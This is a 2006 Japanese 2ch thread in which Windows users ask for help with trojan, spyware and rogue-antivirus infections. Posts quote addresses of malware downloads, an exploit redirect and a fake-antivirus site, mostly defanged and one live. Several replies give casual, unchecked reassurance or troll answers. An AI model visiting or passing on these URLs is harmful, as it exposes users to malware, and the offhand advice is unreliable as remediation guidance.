【症状を具体的に、分かる限りすべて書く】 何も起こらないので逆に不安に
【何をしたらそんなことになったのか】 拾ったファイルがフォルダアイコンに偽装されたexeファイルで起動してしまった
【これまでにとった措置】とりあえずスタートアップ、レジストリに変更点がないか確認 Microsoftにある悪意あるファイルの点検? をしてみました

実害が目に見えてないので不安なのですが、仮に何らかの亜種でバスターでの対応がなされてない場合、どの程度の期間でアップデートファイルが配布されるのでしょう。
また、最終手段としてクリーンインストールする際にバックアップを取ることは避けたほうがいいのでしょうか

よろしくお願いします


71 :名無しさん@お腹いっぱい。:2006/05/09(火) 16:04:45
>>70
ノートンのオンラインスキャンでもしてみたら?

72 :名無しさん@お腹いっぱい。:2006/05/11(木) 02:02:28
>>70
どこで拾ったファイルか詳しく

73 :名無しさん@お腹いっぱい。:2006/05/11(木) 09:44:36
【使用OS】 Windows XP pro
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 Avast
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 発見できず

【症状を具体的に、分かる限りすべて書く】
定期的に
tp://85.255.115.187/users/fill/web/images/rzspy.exe
tp://85.255.115.187/users/fill/web/images/idownload.exe
にアクセスし、その度にAvastが以下のような警告を出す

ウイルスが発見されました。ダウンロードを遮断します

 ファイル名:tp://85.255.115.187/users/fill/web/images/rzspy.exe
 マルウェアの名・タイプ:Win32:Trojan-gen. {Other} ウイルス/ワーム

 ファイル名:tp://85.255.115.187/users/fill/web/images/idownload.exe
 マルウェアの名・タイプ:Win32:Small-TG [Trj] トロイの木馬

【何をしたらそんなことになったのか】ニューススレに張られていたURLをクリックしました
【これまでにとった措置】 AvastでHDDスキャン、Spybot・Ad-awareでスキャン・駆除
【その他の質問】
「何かのウイルス・トロイなどに感染していて、そのウイルスが外部から
rzspy.exeやidownload.exeをダウンロードしようとし、その度にAvastが
遮断するけど、何が原因かわからない」
という状態です。

74 :73:2006/05/11(木) 09:57:26
追加です

://w w w .google.co.jp/search?hl=ja&q=www.doubleh.fr/audio/index.htm&btnI=I%27mFeelingLucky&Ir=

を踏んだらおかしくなりました。
先頭のhttpを消してスペースを入れていますが、このURLにクリックしないでください。

75 :名無しさん@お腹いっぱい。:2006/05/11(木) 12:06:32
またか

76 :名無しさん@お腹いっぱい。:2006/05/11(木) 16:43:44
>>74
そこを調べたらxpl.wmfというのが落ちてきて、これが原因みたいだよ。
ttp://www.mcafee.com/japan/security/virE.asp?v=Exploit-WMF
他のオンラインスキャンでも試してみたら?

77 : ◆N9P3SuvBPo :2006/05/11(木) 17:53:47
>73
RemoveToolbarというのがIEに張り付いてないか確認

78 :名無しさん@お腹いっぱい。:2006/05/11(木) 20:32:04
【WindowsUpdateしてるか】 自動更新
【AntiVirusは何を使っているか】 Avast!
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 Dドライブに保管しているゲームいくつかの実行ファイルから、
                           Win32:Starax [Trj]を検出。
【症状を具体的に、分かる限りすべて書く】 無い。
【何をしたらそんなことになったのか】 ひさしぶりにプレイしようとダブルクリックしたとたんに検出。
【これまでにとった措置】 現在、全ドライブスキャン中
【その他の質問】 このトロイに関する情報が、Google,Yahoo,MSNなどさまざまな検索でも見当たりません。一体どんなトロイなのでしょうか?

ゲームは全て数ヶ月〜1年ほど前に入手したもので、今まで一切マルウェアの反応はありませんでした。
気付かないうちに、不注意で侵入させてしまったのでしょうか?

79 :名無しさん@お腹いっぱい。:2006/05/11(木) 20:59:27
>>78
侵入していたが、アンチウイルスの対応が遅れていて
検知しなかった。
その後にアンチウイルスが対応し、発見に至った。
という場合もある。

80 :名無しさん@お腹いっぱい。:2006/05/12(金) 07:35:18
【WindowsUpdateしてるか】 自動更新です
【AntiVirusは何を使っているか】 Norton AntiVirus
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 デスクトップPCのCドライブに保管してた圧縮ファイルの中。
ノートパソコンでスキャンしても検知してくれないので名前が分からない…
【症状を具体的に、分かる限りすべて書く】 Mydocumentに(゚∈゚*)***.jpgを作成、リブート後に
「システムがビジーです」の表示の無限増殖、システムの復元の無効です。
なんとかセーフモードから復旧させたのですが、システムの復元だけ有効に
することができないのです。(エラーが発生)
【何をしたらそんなことになったのか】 見るからに怪しげな実行ファイルを反射的に
ダブルクリックしてしまいましたorz
【これまでにとった措置】 全ドライブスキャン。
【その他の質問】 ウイルス名か、システムの復元を有効に戻せる方法を知っている方がおられましたら
どうか宜しくお願い致します

81 :名無しさん@お腹いっぱい。:2006/05/12(金) 10:39:10
こりゃリカバリが最善だね。

82 :名無しさん@お腹いっぱい。:2006/05/12(金) 15:41:04
【使用OS】
Windows XP Version 2002 ServicePack 2
【WindowsUpdateしてるか】
自動更新
【AntiVirusは何を使っているか】
Norton AntiVirus
【ちゃんとUpdateしてるか】
してる
【スキャンした結果(ウイルス名・発見場所)】
%System%\oleext.dll
%System%\System32\oleext32.dll (このファイルは Trojan.Alemod として検出されました)
%System%\intell321.exe
%Windir%\warnhp.html
%UserProfile%\Application Data\Microsoft\Internet Explorer\Desktop.htt
%Windir%\uninstDsk.exe
【別のオンラインスキャンしたならその結果は】
していません・・・・
【症状を具体的に、分かる限りすべて書く】
右下に英語でスパイウェアに感染してますって出る。
それもだけどもっとウザイのはノートンの警告
【何をしたらそんなことになったのか】
なんかたくさんDLしてた。動画とか。フリーソフトとか。
【これまでにとった措置】
スパイウェアかな?って思ってて3つくらいかな?
フリーのをDLして、検出されなかった。
【その他の質問】
ぼくはなにかいけないことをしたんですか><

83 :名無しさん@お腹いっぱい。:2006/05/12(金) 16:20:44
くまー

84 :名無しさん@お腹いっぱい。:2006/05/12(金) 20:05:38
ネトゲのIDやPWを盗むウィルスってネトゲのサイトや、ネトゲにログインさえしなければ盗まれる事はないの?

85 :名無しさん@お腹いっぱい。:2006/05/12(金) 20:30:14
そんなのネトゲの仕様(ID等のデータをPC上に残すか)とウイルスしだいだろ

86 :名無しさん@お腹いっぱい。:2006/05/12(金) 21:17:10
すんません教えて下さい

svchost.exeにウィルスが感染してしまい、
手動で削除するしかない状況ですが
プロセスを終了させると自動的にまたプロセスが開始したり
シャットダウンが始まってしまったりで
全然対処のしようがありません。

セーフモードで起動する?とか、なんかやり方が
あるのでしょうか。ウイルスバスターのHPに書いてある
やり方だと上記のような理由で最初の一歩でこけてしまっています。

だれかヘルプー(泣

87 :名無しさん@お腹いっぱい。:2006/05/12(金) 21:34:37
なんてウイルスに感染したかぐらいは書かないとな、
どうせwinnyでもやってたんだろ?

88 : ◆N9P3SuvBPo :2006/05/12(金) 21:49:51
>87
svchost.exeだけではnyと決め付けるには早いと思うので、

>86
感染ファイルのフルパスは?

89 :名無しさん@お腹いっぱい。:2006/05/12(金) 21:56:16
>svchost.exeにウィルスが感染してしまい、
>手動で削除するしかない状況ですが
>プロセスを終了させると自動的にまたプロセスが開始したり
昔、Winnyで流通していたウイルスでこれと同じ動作のヤツが
あった気がするんだが。

90 : ◆N9P3SuvBPo :2006/05/12(金) 22:08:40
>89
shellsystem.exeとかあるけど、これとはまた別ですよね。

91 :名無しさん@お腹いっぱい。:2006/05/12(金) 22:11:33


92 : ◆N9P3SuvBPo :2006/05/12(金) 22:19:24
c:\windows\system32\drivers\etc\svchost.exe
(↑パス名一部間違えてるかも)これもantinnyとか?

93 :名無しさん@お腹いっぱい。:2006/05/13(土) 14:48:39
>>86
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/



94 :名無しさん@お腹いっぱい。:2006/05/13(土) 18:46:03
お尋ねしても宜しいでしょうか。

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 自動更新ですが、念のため週に1〜2回手動で確認しています。
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006
【ちゃんとUpdateしてるか】 はい、ちゃんと最新の状態に更新しています。
【スキャンした結果(ウイルス名・発見場所)】 発見できない。
【別のオンラインスキャンしたならその結果は】 シマンテックやバスターのオンラインスキャンでは、WinAntiVirus PRO 2006を検出
【症状を具体的に、分かる限りすべて書く】 WinAntiVirus PRO 2006を入れてから動作が悪くなった。
【何をしたらそんなことになったのか】 貴方のパソコンは「ブラックウォーム」に感染される恐れがある。
セキュリティセンターは貴方のパソコンに「セキュリティミッス」を検出しました。現在使っているアンチウィルスでは
情報の流出を防ぐ事ができないと言われた。
【これまでにとった措置】 怖くなってノートン2006を削除してWinAntiVirus PRO 2006をインストール
【その他の質問】 WinAntiVirus PRO 2006が世界最強のセキュリティソフトと聞いたので、クレカで購入しました。

95 :名無しさん@お腹いっぱい。:2006/05/13(土) 18:53:00
くま〜

96 :名無しさん@お腹いっぱい。:2006/05/13(土) 18:53:38
コピペだしなー

97 :名無しさん@お腹いっぱい。:2006/05/14(日) 10:13:32
ネットサーフィンしていたら、突然 ↓ 飛び出してきて、

http://amaena.com/securityworm5/jp/?aid=n180_jp_ja&lid=int&h=&b=0

即座に出てきた画面を閉じたのですが、
画面であなたのパソコンはブラックウオームというウイルスに
やられる可能性があるのですぐにこれをダウンロードしてという
のが出てきたのです。

この詳細知っている人いますか?


98 :名無しさん@お腹いっぱい。:2006/05/14(日) 10:17:38
ダーツに興味ある人はいませんか?
初心者、上級者一切問いません。ダーツを愛する方ならどなたでも結構です。

実はあるダーツ店のマスターが客が来なくてとても困っているようです。


  ↓↓↓ 詳細はこちら ↓↓↓
http://sports9.2ch.net/test/read.cgi/bullseye/1111230059/431-452


できればこのマスターに励ましの言葉をお願いします。
また、もしこの店の近くにお住まいの方はお店の方にも行ってあげてください。
困ったときはお互い様です。ダーツを愛するもの同士助け合いましょう!

99 :名無しさん@お腹いっぱい。:2006/05/14(日) 10:21:04
>>97
書き込む前に少しは調べようよ^^

WinAntiVirus Pro 2006
http://pc8.2ch.net/test/read.cgi/sec/1143972325/

100 :名無しさん@お腹いっぱい。:2006/05/14(日) 12:10:40
ウィルスバスターで、無線LANパトロールをやったんです。
そしたら、信頼済みでないコンピュータ/機器がネットワークに接続
されていますと出て、かなりの件数の違ったIPアドレスが表示された
のですが、これはなんでしょうか。
よろしくお願いします。




101 :名無しさん@お腹いっぱい。:2006/05/14(日) 13:43:35
>>100
すれ違いが、IP調べてみれば?
実際にアクセスしてきてるのが
モデム、ルータ、接続機器orPC、他人
自分が「信頼済み」登録しないと
出るから
勿論、他人からの不法アクセスは
ブロックするべきですが

102 :名無しさん@お腹いっぱい。:2006/05/14(日) 13:44:19
×すれ違いが
○スレ違いっぽいが

103 :名無しさん@お腹いっぱい。:2006/05/14(日) 14:29:00
ねぇねぇアメリカって公式サイトでも危険なの?

ビルボードのアルバムチャート見たら
ウィルスに感染しました
WinAntiVirus Pro 2006のダウンロードを推奨しますだって
商業的な公式サイトなのにさぁひどくねぇ?
日本でいろいろ公式サイト回ったけど
ウィルスの感染なんか心配すらしたことなかったのに
自社サイトの安全管理すらできないってどうなの?

大丈夫アメリカ?
セキュリティーソフト販売のための戦略じゃないよね?

104 :名無しさん@お腹いっぱい。:2006/05/14(日) 15:03:53
tp://www.geocities.com/keisatu_sousa_shinjitu/index.htm
このサイトをふんだんですが、ウィルスのようで
housecallというウィルスに感染しました。
ノートンで検索かけてもヒットしません。
対処法を教えていただけませんか?

105 :名無しさん@お腹いっぱい。:2006/05/14(日) 15:08:56
どうやって感染したって分かったの?

106 :名無しさん@お腹いっぱい。:2006/05/14(日) 15:11:33
>>104
開いてすぐに、何か沢山窓が開いて
作業が行われていたような状態でした。
個人情報をネットにアップロードするような
ウィルスだったら怖いので・・
他スレで質問したところウィルス有害との鑑定も出ました。

107 :名無しさん@お腹いっぱい。:2006/05/14(日) 16:05:15
>>104
タダのブラクラだよ、心配しないでおk。

108 :名無しさん@お腹いっぱい。:2006/05/14(日) 17:14:15
  \                 ,ィ":::::::::::::::::::;;;;;:ii>;,、  .../私をあまり怒らせないほうがいいぞ
         \               /:::::::::::::::;;;;;;;;iii彡" :ヤi、
           \.             i::::::::::::;:"~ ̄     ::i||li ∧__T _ ,,,r -r-T‐-、
            \              |:::::::::j'_,.ィ^' ‐、 _,,. ::iii》"~。r *o:*::f:::r:::..l. |
   ::::::::::::::       \    __,-,,-、  ___|:::i´`  `‐-‐"^{" `リ" ::::::::*o;;;ro ot _f_ヽ丿
   ::::::::┃二\     _\__/| | l |ヾ-"~  ヾ;Y     ,.,li`~~i,,..-v--'''''''"V"~~ ┴
   :::::::┃. \\  l⌒l二|-l ..uUU""l----' ''`i、   ・=-_、, .:/::::::::::::::::|
   :::::::┃-=-`9|、  "~ ...| ヽ  l ̄”/:::: __.、_|ヽ    ''  :/´:::::::::::::::|
  ::::::::::┃ヽ _ ヽ      |  |  / ..,-" //| ;;   ::::  ;; l l ` ;  :::::::|
  :::::::::::┃i".ヾ, |      ..| /  |  / ;; | | l   ;;;;  _//  `;; 、::|
   ::::::::┃||" /l___     | /   | /  l; | |   "〜-""~ //     `,
   ::::_/|\:~/| |   . |/   |/-   /|.|       //  ;; ;;   `,
    |  |_  ,,,,|  |   ../   . |  \ | |____    _//  ;  l|    `,
    |  | ""    |   /   ;' .|  /"/o  "" " " o\  ";.|:::::::::  l_ 
    |   |      l ... /   ;; |;;;;;". l/::::::::::::::::::::::::::::::::::`l :::::: l::::: _ - ".l
    .|   |      |  |   .;; l  / ::::::::::::::::::::::::::::::::::::::: `l :::l/    ;;` ; 
    |   |      | .`l    "_ノ"\ ::::::::::::::::::::::::::::::::::::::::::| / `;;   ;;; l

109 :名無しさん@お腹いっぱい。:2006/05/14(日) 20:14:48
OS:WindowsXP
アンチウイルスソフト:なし
回線・プロバイダ:Bフレッツ・BIGLOBE

一年ぶりにネット環境に復帰した初日にやられました。急に重くなり、
'C:\windows\system32\lsass.exe'は状態コード1073741819で中断・・・・
というメッセージが出てカウントダウン後シャットダウンされるようになりました
オンラインでスキャンするとウイルス名はBloodhound,Exploit.6というもので
発見場所は2つ、どちらもLive2chのファイルでしたので、Live2chは
すぐに削除しました。その後スキャンすると検出ウィルスはなしでしたが、
シャットダウンは止まらず、『ファイル名を指定して実行』でshutdown ーaと
入力すると一時的にはおさまりますが、再起動するとまた出てしまいます。
またWindowsをupdateしようとするとエラー:0x800A0007となりできません
どうしたら良いでしょうか?


110 :名無しさん@お腹いっぱい。:2006/05/14(日) 20:24:29
>>109
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/

111 :名無しさん@お腹いっぱい。:2006/05/14(日) 21:42:09
>>110
やっぱりその方法しかないですか・・・orz
ありがとうございました。


112 :名無しさん@お腹いっぱい。:2006/05/14(日) 21:55:37
>>109
うそつくな
lsassが落ちるとカウントダウンなどせずに即再起動
RPCとは違うんだ

113 :名無しさん@お腹いっぱい。:2006/05/14(日) 22:49:04
どうでもいいけどノートンでもいいからいれとけ

114 :名無しさん@お腹いっぱい。:2006/05/14(日) 23:03:17
そうだそうだ

115 :名無しさん@お腹いっぱい。:2006/05/14(日) 23:08:20
http://harada2006.hp.infoseek.co.jp/P-DES.html

116 :名無しさん@お腹いっぱい。:2006/05/15(月) 10:17:42
【使用OS】Windows XP Home
【WindowsUpdateしてるか】yes
【AntiVirusは何を使っているか】ウイルスバスター 2006
【ちゃんとUpdateしてるか】yes
【スキャンした結果(ウイルス名・発見場所)】TROJ_ABWIZ.AY TROJ_DLOADER.ASP TROJ_DLOADER.ASO
C:\DOCUME~1\ちょめちょめ\LOCALS~1\Temp\5.dlb  6.dlb  7.dlb
【別のオンラインスキャンしたならその結果は】隔離、削除
【症状を具体的に、分かる限りすべて書く】再起動すると復活。タスクマネージャが開かない。
ttp://xazsa.ath.cx/up/src/xazsa0656.jpg こんなのが出る。
【何をしたらそんなことになったのか】
ゲームでVBを切ったまま、ニュー速+のどこか貼ってあったエロ小説の"続きはここ"に騙された。
兄と妹というシチュエーションだっただけに、うっかり。
【これまでにとった措置】バスタ公式に削除だけで済むと書いてあるが、復活する。
【その他の質問】助けてください。

117 :名無しさん@お腹いっぱい。:2006/05/15(月) 11:24:14
で、その「兄と妹のエロ小説」はどんなものなんだ?

118 :名無しさん@お腹いっぱい。:2006/05/15(月) 12:56:15
>>116
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-29113
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-22186
この辺じゃない?

119 :名無しさん@お腹いっぱい。:2006/05/15(月) 13:36:09
Zone Labsのオンラインスパイウェアスキャンを行なったところ、

AlexaToolbar - Browser Plugin

RegistryKey - HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\
Extensions\{C95FE080-8F5D-11D2-A20B-00AA003C157A}\
RegistryKey - HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\
Extensions\CmdMapping\{C95FE080-8F5D-11D2-A20B-00AA003C157A}

のように検出されたのですが、これはどういった類のスパイウェアだと思われますか?
また、これの除去はだたキーを削除するだけではいけないのでしょうか?

120 :名無しさん@お腹いっぱい。:2006/05/15(月) 13:46:52
>>119
ttp://clubjs.tsukaeru.jp/cgi/win/cf.cgi?mode=al2&namber=8119&rev=&no=0


121 :119:2006/05/15(月) 15:26:00
ありがとうございます。どうにか検出されなくなりました。
しかしどこで感染したかなー。

122 :名無しさん@お腹いっぱい。:2006/05/15(月) 16:51:02
>>118
ありがとうございます。
でもその辺は色々と試しましたが改善されませんでした。

右下のマークにYour computer is infectedと表示されます。
ただの騙しスパイウェアだとは思いますが、googleで検索しても変な所に飛ばされたりします。
似たような物はいくつか見つかるんですが同名の物の対処法が全く見つかりません。

123 :名無しさん@お腹いっぱい。:2006/05/15(月) 17:13:09
>>122
ttp://www.higaitaisaku.com/fakewarning.html
ダメ?

124 :名無しさん@お腹いっぱい。:2006/05/15(月) 21:36:23
最近PCが不調っぽいので調べたら感染してたようです
【使用OS】 Win2k SP4
【WindowsUpdateしてるか】 してますよ。
【AntiVirusは何を使っているか】 WinFixer 2005
【ちゃんとUpdateしてるか】 もちろん。
【スキャンした結果(ウイルス名・発見場所)】 spyware-cookie
【別のオンラインスキャンしたならその結果は】 c:\program files\winfixerフォルダ内から多数
【症状を具体的に、分かる限りすべて書く】 winfixerというセキュリティソフトを入れてからPCが不調に
【何をしたらそんなことになったのか】 「エラーが見つかった」レジストリやシステムの有り得るエラーで
ご利用のパソコンは機能が悪くなってブロックになる。というメッセージが出てきた。
【これまでにとった措置】 パソコンが壊れるのはどうしても避けなければならず、NOD32を消してWinFixer 2005を入れた
【その他の質問】 オンラインスキャンでWinFixerが検出されるのは誤検出ですか?

125 :名無しさん@お腹いっぱい。:2006/05/15(月) 21:48:13
>>124
笑わせないでくれよ。

126 :名無しさん@お腹いっぱい。:2006/05/15(月) 21:55:18
>>124
二番煎じって知ってる?

127 :名無しさん@お腹いっぱい。:2006/05/15(月) 22:26:46
>>124
リアルだったらカワイソス


128 :名無しさん@お腹いっぱい。:2006/05/15(月) 22:33:02
【AntiVirusは何を使っているか】 WinFixer 2005

すごいうけたw
うそだろうけど><;

129 :名無しさん@お腹いっぱい。:2006/05/15(月) 22:44:52
>>127
レスが無いところを考えるとウソだろ。

130 :名無しさん@お腹いっぱい。:2006/05/15(月) 22:53:03
いつからパクリのネタスレになったんだよ、ここは

131 :名無しさん@お腹いっぱい。:2006/05/16(火) 00:55:18
ワーム名でGoogle等の検索をかけても、情報がほとんど出て来ません。
対処方法をご存知の方がいらっしゃいましたら、
教えていただけないでしょうか。

【使用OS】Windows2000 SP4
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】AVG FLEE Edition 7.1.392
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】
ワーム名:Kelvir.JN と Kelvir.IQ
検出されたファイルは、C:\WINNT\eraseme_******.exe
(*****の所には数字が入ります)

【別のオンラインスキャンしたならその結果は】
トレンドマイクロ・オンラインスキャンを実行した所、未検出でした。
(eraseme_*****.exeは削除済で実行)

【症状を具体的に、分かる限りすべて書く】
kelvirの亜種のようですが、AVGで検出出来て削除しても再び検出される事から、
レジストリに書き込まれている可能性があります。

【何をしたらそんなことになったのか】
特に記憶になし。メッセンジャーでurlをクリックしてはいません。

【これまでにとった措置】
AVGの機能で対処。

132 :名無しさん@お腹いっぱい。:2006/05/16(火) 01:48:43
トロイが検知されて削除されました。
スキャンしたら何も検出されませんでした。
この状態は感染してないってことですか?
他にしておくべきことはなんですか?

【使用OS】 Windows XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 McAfee
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 何も検出されず
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】 何もなし
【何をしたらそんなことになったのか】 ネットサーフィン
【これまでにとった措置】ウイルス スキャン
【その他の質問】


133 :名無しさん@お腹いっぱい。:2006/05/16(火) 02:29:37
だいじぶだと思うよ。
どうしても心配なら他のオンラインスキャンでためしてみ

134 :132:2006/05/16(火) 02:50:45
>>133
ありがとうございます。
これで安心して眠れます。
おやすみなさい。

135 :132:2006/05/16(火) 03:37:14
眠れないのでオンラインスキャンしてみたら
メモリ上でウイルスは見つかりませんでしたと出ましたが
12個のウイルスが検出されたみたいです。
Bloodhound.Exploit.6というウイルスらしいのですが
感染ファイルは全部Live2chのファイルでした。
どうしたらいいんでしょうか?
ちなみにシマンテックでスキャンしました。

136 :名無しさん@お腹いっぱい。:2006/05/16(火) 03:41:22
それならだいじぶ
放置でおk

137 :132:2006/05/16(火) 03:48:35
>>136
ファイルを削除するなどもする必要はないのですね。
迅速な回答ありがとうございました。


138 : ◆N9P3SuvBPo :2006/05/16(火) 18:45:34
詰まらないと思うけど…
【使用OS】 Win98SE
【WindowsUpdateしてるか】 Sir,No Sir!
【AntiVirusは何を使っているか】 マカフィー(最初から入っていた)
【ちゃんとUpdateしてるか】 Sir,No Sir!
【スキャンした結果(ウイルス名・発見場所)】 検出なし
【別のオンラインスキャンしたならその結果は】 バスターのオンラインスキャンで
VBS_REDLOF.Aが、c:\windows\system\kernel.dll,folder.htt,など、約7000個。
【症状を具体的に、分かる限りすべて書く】 動作が遅くて、時々ブルースクリーンが出る。
壁紙が「ウイルスに感染してるよ」みたいな文に変更された。
【何をしたらそんなことになったのか】 ネットサーフィン
【これまでにとった措置】 トレンドマイクロのシステムクリーナーを使用
【その他の質問】 リカバリしたら負けかなと思ってる。

139 :名無しさん@お腹いっぱい。:2006/05/16(火) 19:26:44
何がしたいんだお前は

140 :名無しさん@お腹いっぱい。:2006/05/17(水) 00:25:47
>>138
ネタだとしてもつまらなすぎる

141 :名無しさん@お腹いっぱい。:2006/05/17(水) 11:38:10
まじめにお伺いしますがウィルスって誰が作ってるの?

142 :名無しさん@お腹いっぱい。:2006/05/17(水) 11:39:52
作りたい人が作ってるし、手に入れることが出来るサイトもある

143 :名無しさん@お腹いっぱい。:2006/05/17(水) 12:19:28
まあ捕まえてみたら、高校生ぐらいの人だったとか普通にあるから
遊び半分自慢したい人とかがほとんどじゃない?


144 :名無しさん@お腹いっぱい。:2006/05/17(水) 17:35:49
>132さんと同じような症状です。
トロイの木馬が検知され削除しました。

【使用OS】WindowsXP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】 McAfee
【ちゃんとUpdateしてるか】 いいえ
【スキャンした結果(ウイルス名・発見場所)】 無し
【別のオンラインスキャンしたならその結果は】 シマンテックでスキャンした所、3つ検出されました。
1.C:\WINDOWS\Downloaded Program Files\Install.dllはSpywareStormerに感染しています
2.2chログ内の*****.datはUnix.Penguinに感染しています
3.2chログ内のsubject.txtはBloodhound.Exploit.6に感染しています。
【症状を具体的に、分かる限りすべて書く】 何もなし
【何をしたらそんなことになったのか】 インターネット
【これまでにとった措置】ウイルススキャン
【その他の質問】Bloodhound.Exploit.6は放置しても良いと上記で見ました。
Unix.PenguinもOSがWindowsなら問題ないとどこかのサイトで見ましたが、放置して良いのでしょうか?
またDownloaded Program Filesフォルダ内にInstall.dllは見当たりません。
どう対処すれば良いのでしょうか?

145 :名無しさん@お腹いっぱい。:2006/05/17(水) 17:41:28
>>144
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-spywarestormer.html
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1448098
変なプログラム入ってない?

146 :144:2006/05/17(水) 18:06:42
>145
レスありがとうございます

大分昔の話ですが、SpywareStormerのサイトでスキャンをし、
課金しないとどうの…となって止めた覚えがあります。
その後SpywareStormerをインストールしてしまったのか、
またアンインストールをしたのか全く記憶にありませんorz

プログラムの追加と削除にはありませんし、「Spyware」で
ファイルの検索をしましたが何もヒットしませんでした。
とりあえずHijackThisというソフトウェアをダウンロードして
教えて頂いたサイトの手順通りに実行してみようと思います。

147 : ◆N9P3SuvBPo :2006/05/17(水) 18:47:43
>140
やはりあの2つには勝てませんね。

>144
C:\WINDOWS\Downloaded Program Files\desktop.ini
CLSIDの頭に;(セミコロン)を付けて上書き保存
もう一度C:\WINDOWS\Downloaded Program Files\を開く
Install.dllが見えるようになるので削除
終わったらC:\WINDOWS\Downloaded Program Files\desktop.ini
CLSIDの頭に付けた;(セミコロン)を消して上書き保存
もしくはコマンドプロンプトを使って削除

148 :名無しさん@お腹いっぱい。:2006/05/17(水) 18:54:27
そんなぁ・・・

149 :名無しさん@お腹いっぱい。:2006/05/17(水) 20:26:49
【使用OS】 XP pro
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 norton
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 検出されず
【別のオンラインスキャンしたならその結果は】 していない
【症状を具体的に、分かる限りすべて書く】 特に何も 山田の派生と聞いてちょっとビクビクして
【何をしたらそんなことになったのか】 ブラウザJaneでこの二つを踏みました
tp://www.uploda.org/uporg392643.jpg
tp://up2.viploader.net/pic/src/viploader162057.jpg
【これまでにとった措置】 スキャン→検出されず
【その他の質問】 とりあえずクリックしたらいっぱいフレームが出てきそうだったので
なんとなく閉じてキャッシュもすぐに消しました。放置していたらまずいんでしょうか?

150 :名無しさん@お腹いっぱい。:2006/05/17(水) 20:36:07
ブラクラと同じようなウイルスだから気にしないでイイよ
WinBombていうウイルス。イチイチ馬鹿に釣られるなよ

151 :名無しさん@お腹いっぱい。:2006/05/17(水) 20:38:01
すばやい御返答ありがとうございます。
よく聞く名前のものですね。

152 :名無しさん@お腹いっぱい。:2006/05/17(水) 21:28:03
【使用OS】 winxp pro sp2

【WindowsUpdateしてるか】 してます

【AntiVirusは何を使っているか】 Norton Anti Virus

【ちゃんとUpdateしてるか】 してます

【スキャンした結果(ウイルス名・発見場所)】 なにもない

【別のオンラインスキャンしたならその結果は】 pandasoftware,kaspersky,viruschaserでいずれも
なにも検出されず。

【症状を具体的に、分かる限りすべて書く】 symantecのオンラインスキャンにアクセスできない。
trendmicro.co.jpに全くアクセスできない。etrustのオンラインスキャンができない。
Norton Anti Virusのliveupdateのファイルが破損してると一度だけ警告してきたが、
二度目試したら、正しく完了。

【何をしたらそんなことになったのか】 ?

【これまでにとった措置】 hostsファイルを見たところ、なにも変更がされていない。クッキーと
temporaryファイルをすべて削除してみたが、全く変わりが見られない。
Nortonを無効にして、Avastを試したところ、なにも検出されなかった。
netstatを見てみたが、これも異常な接続は見られない。

【その他の質問】 おわかりの方、よろしくお願いします。

153 :名無しさん@お腹いっぱい。:2006/05/17(水) 22:02:17
>>152
hostsを書き換えられてアンチウイルスのサイトに
繋がらなくなる可能性があるけどそうじゃないんでしょ?
他のブラウザではどうなんでしょうか?
オペラやファイヤーフォックスなど。

154 :名無しさん@お腹いっぱい。:2006/05/17(水) 22:19:55
>>153
USBのフラッシュメモリをPCに挿して、portable firefoxを使ってサイトを見てみましたが、
結果は同じく、表示されませんでした。
hostsは書き換えられてないようです・・・

155 :144:2006/05/18(木) 11:22:33
>147
ありがとうございます!

なぜかDownloaded Program Filesフォルダ内にdesktop.iniが無かったので
コマンドプロンプトからinstall.dllを削除しました。
再度オンラインスキャンをかけた所、Bloodhound.Exploit.6とUnix.Penguinだけが
検出されたのでとりあえず一段落…かな?


156 :名無しさん@お腹いっぱい。:2006/05/18(木) 15:14:48
>>155
>なぜかDownloaded Program Filesフォルダ内にdesktop.iniが無かったので

Explorerからは見えないからファイル名を指定して実行にそう入れるんだよ

157 : ◆N9P3SuvBPo :2006/05/18(木) 17:46:55
>155
特にPCの動作に影響が無ければ一段落です。
>Bloodhound.Exploit.6とUnix.Penguin
これは2chログ内のコードに反応しているだけで
全く問題ないので放置してよろしいかと。

158 :155:2006/05/19(金) 10:41:16
>156
ああっ、そういうことだったんですね。
無知ですみません…orz

>157
度々ありがとうございます。
2chブラウザ(Jane)を消しちゃおうかとも思ったのですが
PCは正常に動作していますので放置しておきます。

